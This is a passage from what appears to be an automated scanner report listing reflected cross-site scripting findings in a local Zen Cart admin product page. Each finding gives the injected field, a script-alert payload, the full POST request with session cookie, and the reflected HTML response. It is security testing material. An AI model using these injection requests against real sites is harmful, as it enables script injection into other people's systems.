<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5"><script>alert(14405309.65177)</script>        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=



Finding 3.33:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_description[1]
Injection value: <script>alert(14405309.65187)</script>
Detection value: <script>alert(14405309.65187)</script>

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------32072267314898
Content-Length: 4983

-----------------------------32072267314898
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------32072267314898
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------32072267314898
Content-Disposition: form-data; name="master_category"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------32072267314898
Content-Disposition: form-data; name="products_status"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------32072267314898
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------32072267314898
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------32072267314898
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_price"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------32072267314898
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------32072267314898
Content-Disposition: form-data; name="products_description[1]"

<script>alert(14405309.65187)</script>
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------32072267314898
Content-Disposition: form-data; name="products_model"

testval
-----------------------------32072267314898
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------32072267314898
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------32072267314898
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------32072267314898
Content-Disposition: form-data; name="image_delete"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="overwrite"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------32072267314898
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------32072267314898
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------32072267314898
Content-Disposition: form-data; name="products_weight"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------32072267314898
Content-Disposition: form-data; name="search"

test
-----------------------------32072267314898
Content-Disposition: form-data; name="x"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="y"

0
-----------------------------32072267314898--



HTTP Response
----Truncated due to large size ---
 
" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5"><script>alert(14405309.65187)</script>        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
<form name="update_product" action="http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=update_product&page=1" method="post" enctype="multipart/form-data"><input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" />      <tr>
        <td align="right" class="smal



Finding 3.34:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: img_dir
Injection value: >"><script>alert(14405309.65627)</script>
Detection value: alert(14405309.65627)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------32072267314898
Content-Length: 4986

-----------------------------32072267314898
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------32072267314898
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------32072267314898
Content-Disposition: form-data; name="master_category"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------32072267314898
Content-Disposition: form-data; name="products_status"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------32072267314898
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------32072267314898
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------32072267314898
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_price"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------32072267314898
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------32072267314898
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------32072267314898
Content-Disposition: form-data; name="products_model"

testval
-----------------------------32072267314898
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------32072267314898
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------32072267314898
Content-Disposition: form-data; name="img_dir"

>"><script>alert(14405309.65627)</script>
-----------------------------32072267314898
Content-Disposition: form-data; name="image_delete"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="overwrite"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------32072267314898
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------32072267314898
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------32072267314898
Content-Disposition: form-data; name="products_weight"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------32072267314898
Content-Disposition: form-data; name="search"

test
-----------------------------32072267314898
Content-Disposition: form-data; name="x"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="y"

0
-----------------------------32072267314898--



HTTP Response
----Truncated due to large size ---
 
Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_types.php">Media Types</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/>"><script>alert(14405309.65627)</script>25" border="0" alt=">"><script>alert(14405309.65627)</script>25" title=" >"><script>alert(14405309.65627)</script>25 " width="100" height="80" align="right" hspace="5" vspace="5">Default text        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspaci



Finding 3.35:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_image_manual
Injection value: >"><script>alert(14405309.65777)</script>
Detection value: alert(14405309.65777)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------32072267314898
Content-Length: 4988

-----------------------------32072267314898
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------32072267314898
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------32072267314898
Content-Disposition: form-data; name="master_category"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------32072267314898
Content-Disposition: form-data; name="products_status"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------32072267314898
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------32072267314898
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------32072267314898
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_price"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------32072267314898
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------32072267314898
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------32072267314898
Content-Disposition: form-data; name="products_model"

testval
-----------------------------32072267314898
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------32072267314898
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------32072267314898
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------32072267314898
Content-Disposition: form-data; name="image_delete"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="overwrite"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_image_manual"

>"><script>alert(14405309.65777)</script>
-----------------------------32072267314898
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------32072267314898
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------32072267314898
Content-Disposition: form-data; name="products_weight"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------32072267314898
Content-Disposition: form-data; name="search"

test
-----------------------------32072267314898
Content-Disposition: form-data; name="x"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="y"

0
-----------------------------32072267314898--



HTTP Response
----Truncated due to large size ---
 
ger</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_types.php">Media Types</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/>"><script>alert(14405309.65777)</script>" border="0" alt="3ds/>"><script>alert(14405309.65777)</script>" title=" 3ds/>"><script>alert(14405309.65777)</script> " width="100" height="80" align="right" hspace="5" vspace="5">Default text        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspa



Finding 3.36:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_url[2]
Injection value: >"><script>alert(14405309.65837)</script>
Detection value: alert(14405309.65837)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------32072267314898
Content-Length: 4970

-----------------------------32072267314898
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------32072267314898
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------32072267314898
Content-Disposition: form-data; name="master_category"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------32072267314898
Content-Disposition: form-data; name="products_status"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------32072267314898
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------32072267314898
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------32072267314898
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_price"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------32072267314898
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------32072267314898
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------32072267314898
Content-Disposition: form-data; name="products_model"

testval
-----------------------------32072267314898
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------32072267314898
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------32072267314898
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------32072267314898
Content-Disposition: form-data; name="image_delete"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="overwrite"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------32072267314898
Content-Disposition: form-data; name="products_url[2]"

>"><script>alert(14405309.65837)</script>
-----------------------------32072267314898
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------32072267314898
Content-Disposition: form-data; name="products_weight"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------32072267314898
Content-Disposition: form-data; name="search"

test
-----------------------------32072267314898
Content-Disposition: form-data; name="x"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="y"

0
-----------------------------32072267314898--



HTTP Response
----Truncated due to large size ---
 
h="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5">Default text        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://>"><script>alert(14405309.65837)</script>" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      



Finding 3.37:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_url[1]
Injection value: >"><script>alert(14405309.66027)</script>
Detection value: alert(14405309.66027)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------32072267314898
Content-Length: 4970

-----------------------------32072267314898
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------32072267314898
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------32072267314898
Content-Disposition: form-data; name="master_category"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------32072267314898
Content-Disposition: form-data; name="products_status"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------32072267314898
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------32072267314898
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------32072267314898
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_price"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------32072267314898
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------32072267314898
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------32072267314898
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------32072267314898
Content-Disposition: form-data; name="products_model"

testval
-----------------------------32072267314898
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------32072267314898
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------32072267314898
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------32072267314898
Content-Disposition: form-data; name="image_delete"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="overwrite"

1
-----------------------------32072267314898
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------32072267314898
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------32072267314898
Content-Disposition: form-data; name="products_url[1]"

>"><script>alert(14405309.66027)</script>
-----------------------------32072267314898
Content-Disposition: form-data; name="products_weight"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------32072267314898
Content-Disposition: form-data; name="search"

test
-----------------------------32072267314898
Content-Disposition: form-data; name="x"

0
-----------------------------32072267314898
Content-Disposition: form-data; name="y"

0
-----------------------------32072267314898--



HTTP Response
----Truncated due to large size ---
 
"100%" cellspacing="0" cellpadding="2">
      <tr>
